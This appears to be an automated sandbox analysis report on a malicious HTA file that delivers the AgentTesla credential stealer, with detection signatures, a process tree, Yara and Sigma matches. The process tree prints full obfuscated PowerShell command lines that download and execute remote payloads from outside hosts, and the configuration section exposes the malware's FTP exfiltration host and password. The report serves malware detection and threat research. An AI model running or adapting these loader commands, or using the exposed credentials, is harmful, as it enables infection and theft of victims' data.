Edit tour

Windows Analysis Report
seethebestthingswithgreatsituationshandletotheprogress.hta

Overview

General Information

Sample name:	seethebestthingswithgreatsituationshandletotheprogress.hta
Analysis ID:	1559142
MD5:	01928c833c9940a6896666a9d93b9670
SHA1:	abe22dd055a6fa39c615cf72818e474f2525e7ae
SHA256:	fa54825b8b94917037cc1620eb21421f9bd31ac394f396c1fe80546e4ed88dfa
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike, AgentTesla, HTMLPhisher

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Cobalt Strike Beacon

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected HtmlPhish44

Yara detected Powershell download and execute

AI detected suspicious sample

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Obfuscated command line found

PowerShell case anomaly found

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 1780 cmdline: mshta.exe "C:\Users\user\Desktop\seethebestthingswithgreatsituationshandletotheprogress.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 4176 cmdline: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 3496 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 1476 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D39.tmp" "c:\Users\user\AppData\Local\Temp\ndpe2s1t\CSCD8BAC46370384FA881732B4F85FC96.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 1136 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 4616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

AddInProcess32.exe (PID: 1012 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.elquijotebanquetes.com", "Username": "mybloddycockcpanel_owner@elquijotebanquetes.com", "Password": "4r@d15PS!-!h"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
seethebestthingswithgreatsituationshandletotheprogress.hta	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.3345591144.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2478122048.0000000009526000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2478122048.0000000009526000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: powershell.exe PID: 4616	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x537b:$b3: ::UTF8.GetString( 0x5d1d:$b3: ::UTF8.GetString( 0x7487:$b3: ::UTF8.GetString( 0x7e32:$b3: ::UTF8.GetString( 0x8dd0:$b3: ::UTF8.GetString( 0x9f42:$b3: ::UTF8.GetString( 0x3d031:$b3: ::UTF8.GetString( 0x3d6b1:$b3: ::UTF8.GetString( 0x3e131:$b3: ::UTF8.GetString( 0x3f37b:$b3: ::UTF8.GetString( 0x3faee:$b3: ::UTF8.GetString( 0x40449:$b3: ::UTF8.GetString( 0x40b48:$b3: ::UTF8.GetString( 0x42e2c:$b3: ::UTF8.GetString( 0x44239:$b3: ::UTF8.GetString( 0x44c77:$b3: ::UTF8.GetString( 0x45622:$b3: ::UTF8.GetString( 0x76843:$b3: ::UTF8.GetString( 0x77770:$b3: ::UTF8.GetString( 0x78b69:$b3: ::UTF8.GetString( 0x79514:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 7036	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7036	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 7036	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: powershell.exe PID: 7036	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x472105:$b2: ::FromBase64String( 0x473bc3:$b2: ::FromBase64String( 0x6ab308:$b2: ::FromBase64String( 0x1480f:$b3: ::UTF8.GetString( 0x14f02:$b3: ::UTF8.GetString( 0x40782:$b3: ::UTF8.GetString( 0x46b87:$b3: ::UTF8.GetString( 0x4727a:$b3: ::UTF8.GetString( 0x40a172:$b3: ::UTF8.GetString( 0x40a865:$b3: ::UTF8.GetString( 0x470e11:$b3: ::UTF8.GetString( 0x471ece:$b3: ::UTF8.GetString( 0x4739ca:$b3: ::UTF8.GetString( 0x6a3def:$b3: ::UTF8.GetString( 0x6a44e2:$b3: ::UTF8.GetString( 0x6a81f9:$b3: ::UTF8.GetString( 0x6a8879:$b3: ::UTF8.GetString( 0x6ab10f:$b3: ::UTF8.GetString( 0x6ace4e:$b3: ::UTF8.GetString( 0x9217f6:$b3: ::UTF8.GetString( 0x9226ae:$b3: ::UTF8.GetString(
Process Memory Space: AddInProcess32.exe PID: 1012	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AddInProcess32.exe PID: 1012	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.AddInProcess32.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34673:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x346e5:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3476f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34801:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3486b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x348dd:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34973:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34a03:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.AddInProcess32.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x31783:$s2: GetPrivateProfileString 0x30d7a:$s3: get_OSFullName 0x32505:$s5: remove_Key 0x326e8:$s5: remove_Key 0x335e8:$s6: FtpWebRequest 0x34655:$s7: logins 0x34bc7:$s7: logins 0x378aa:$s7: logins 0x3798a:$s7: logins 0x392dd:$s7: logins 0x38524:$s9: 1.85 (Hash, version 2, native byte-order)
10.2.powershell.exe.95265d0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.powershell.exe.95265d0.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.powershell.exe.95265d0.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32873:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x328e5:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3296f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32a01:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x32a6b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x32add:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32b73:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32c03:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.powershell.exe.95265d0.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2f983:$s2: GetPrivateProfileString 0x2ef7a:$s3: get_OSFullName 0x30705:$s5: remove_Key 0x308e8:$s5: remove_Key 0x317e8:$s6: FtpWebRequest 0x32855:$s7: logins 0x32dc7:$s7: logins 0x35aaa:$s7: logins 0x35b8a:$s7: logins 0x374dd:$s7: logins 0x36724:$s9: 1.85 (Hash, version 2, native byte-order)
10.2.powershell.exe.95265d0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.powershell.exe.95265d0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.powershell.exe.95265d0.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.powershell.exe.95265d0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34673:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x70493:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x346e5:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x70505:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3476f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x7058f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34801:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x70621:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3486b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x7068b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x348dd:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x706fd:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34973:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x70793:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34a03:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x70823:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.powershell.exe.95265d0.0.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x31783:$s2: GetPrivateProfileString 0x6d5a3:$s2: GetPrivateProfileString 0x30d7a:$s3: get_OSFullName 0x6cb9a:$s3: get_OSFullName 0x32505:$s5: remove_Key 0x326e8:$s5: remove_Key 0x6e325:$s5: remove_Key 0x6e508:$s5: remove_Key 0x335e8:$s6: FtpWebRequest 0x6f408:$s6: FtpWebRequest 0x34655:$s7: logins 0x34bc7:$s7: logins 0x378aa:$s7: logins 0x3798a:$s7: logins 0x392dd:$s7: logins 0x70475:$s7: logins 0x709e7:$s7: logins 0x736ca:$s7: logins 0x737aa:$s7: logins 0x750fd:$s7: logins 0x38524:$s9: 1.85 (Hash, version 2, native byte-order)
Click to see the 9 entries

Other

Source	Rule	Description	Author	Strings
amsi32_7036.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2